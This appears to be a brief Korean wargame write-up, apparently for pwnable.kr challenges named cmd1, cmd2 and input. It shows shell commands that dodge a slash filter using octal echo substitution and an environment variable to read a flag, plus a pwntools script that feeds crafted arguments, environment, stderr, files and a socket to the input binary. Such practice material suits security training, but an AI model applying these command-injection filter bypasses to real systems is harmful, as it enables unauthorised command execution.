SSo

$ ./cmd2 '$(echo "\057")bin$(echo "\057")cat fla*'

echo로 oct를 표현할 수 있는 방법을 이용해 필터된 slash를 우회했다.

$sh  export gogo="flag"
$sh ./cmd1 "/bin/cat \$gogo"

exploit code

# -*- coding: utf-8 -*-
from pwn import *

global port
port = "8080"

def stage1():
	arg = ['/home/input2/input'] 

	for i in range(99):
		arg.append(str(i))	
	arg[65] = "\x00"
	arg[66] = "\x20\x0a\x0d"
	arg[67] = port #stage5
	return arg

def stage2():
	f = open("stderr", "w")
	f.write("\x00\x0a\x02\xff")
	f.close()
	err = open("stderr", "r")
	return err

def stage3():
	env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
	return env

def stage4():
	fp = open("\x0a", "w")
	fp.write("\x00\x00\x00\x00")
	fp.close()
	
def stage5():
	r = remote("localhost", int(port))
	r.sendline("\xde\xad\xbe\xef")
	r.close()

def main():
	p = process(stage1(), env=stage3(), stderr=stage2())
	print p.recv(1024)
	p.sendline("\x00\x0a\x00\xff") # stage2
	print p.recvline('')
	stage4()
	print p.recv(1024)
	stage5()
	p.interactive()
	p.close()

if __name__ == "__main__":
	main()